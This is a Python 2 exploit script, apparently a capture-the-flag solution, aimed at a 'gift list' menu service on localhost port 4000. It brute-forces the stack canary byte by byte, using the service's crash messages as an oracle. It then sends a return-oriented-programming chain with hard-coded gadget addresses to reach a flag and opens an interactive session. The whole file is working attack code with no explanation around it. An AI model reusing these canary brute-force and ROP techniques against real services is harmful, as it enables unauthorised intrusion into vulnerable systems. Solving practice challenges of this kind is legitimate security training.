import socket
import struct
import time
import os
from telnetlib import *

class Exploit():

	Dest = ("localhost",4000)
	
	def start(self):
		self.Connect()

	def Connect(self):
		self.s = socket.socket()
		self.s.connect(self.Dest)

	def CloseSock(self):
		self.s.close()

	def read_until(self,msg):
		tmp = ""
		while(True):
			tmp += self.s.recv(1)
			if msg in tmp:
				break;

		return tmp

	def Sendln(self,msg):
		self.s.send(msg+"\n")

	def Send(self,msg,until):
		self.read_until(until)
		self.Sendln(msg)

	def RawSend(self,msg,until):
		self.read_until(until)
		self.s.send(msg)

	def Interact(self):
		t = Telnet()
		t.sock = self.s
		t.interact()

	def ReadyCanaryLeak(self,canary):
		self.Send("1","--->") # Insert gift list
		self.Send("A"*16,"Gift Name? >>>")
		self.Send("-1","Number of Gift? >>>")

		self.Send("1","--->") # Insert second list
		self.RawSend(canary,"Gift Name? >>>")
		self.Send("-1","Number of Gift? >>>")

		# self.Send("2","--->")
		# self.Send("A"*16,"Gift Name? >>>")
		# self.Send("3","Number of Gift? >>>")

	def CanaryLeak(self):
		Sum = lambda canary : reduce(lambda x,y : x+y, canary)
		tmpcanary1 = ['\xff']
		for BruteForceCanary in range(3):
			for i in range(0x1,0x100,1):
				self.Connect()
				tmpcanary2 = tmpcanary1[:]
				tmpcanary2.append(chr(i))
				tmpcanary2 = Sum(tmpcanary2)

				print "[*]canary 0x"+tmpcanary2.encode('hex') + " attack !!"
				self.ReadyCanaryLeak(tmpcanary2)
				self.Send("2","--->")
				self.Send("A"*16,"Gift Name? >>>")
				self.Send("3","Number of Gift? >>>")

				time.sleep(0.5)
				buf = self.s.recv(9000)
				if "stack smashing detected" in buf:
					print "[*]fail"
					continue
				elif "Removing Is OK" in buf:
					self.CloseSock()
					print "[*]find canary "+chr(i).encode('hex')
					tmpcanary1.append(chr(i))
					break

		if len(tmpcanary1) == 4 :
			self.Canary = Sum(tmpcanary1)
			"[*]Find All canary : 0x"+self.Canary.encode('hex')
			return self.Canary
		else:
			"[*]Fail to Find canary"

	def Attack(self):

		up = lambda x : struct.unpack("<I",x)
		p = lambda x : struct.pack("<I",x)

		#self.Canary = 'ff3754fd'.decode('hex')
		self.Connect() # new Connect

		''' stage 1 set payload '''
		self.Send("1","--->") # Insert gift list
		self.Send(p(0x8048d03)*2+p(0x8048770)+p(0x8048a93),"Gift Name? >>>") # read@plt, PrintWelcome
		self.Send("0","Number of Gift? >>>")

		self.Send("1","--->") # write this flag
		self.Send(p(0x804b0a4)+p(0x30),"Gift Name? >>>")
		self.Send("0","Number of Gift? >>>")

		self.Send("1","--->") # Insert trigger gift list
		self.Send("A"*16,"Gift Name? >>>")
		self.Send("-1","Number of Gift? >>>")

		'''ret sleding '''
		self.Send("1","--->") # Insert second list
		self.RawSend(self.Canary + "A"*12,"Gift Name? >>>")
		self.Send("134515971","Number of Gift? >>>")	#ret

		self.Send("1","--->") # Insert second list
		self.RawSend(p(0x8048d03)*4,"Gift Name? >>>") #ret
		self.Send("134518038","Number of Gift? >>>") #pop ebp ,ret

		'''attack '''		
		self.Send("2","--->")
		self.Send("A"*16,"Gift Name? >>>")
		self.Send("3","Number of Gift? >>>")

		time.sleep(0.5)
		self.s.send("flag")

		self.Interact()


def main():
	ex = Exploit()
	ex.CanaryLeak()
	ex.Attack()


if __name__ == '__main__':
	main()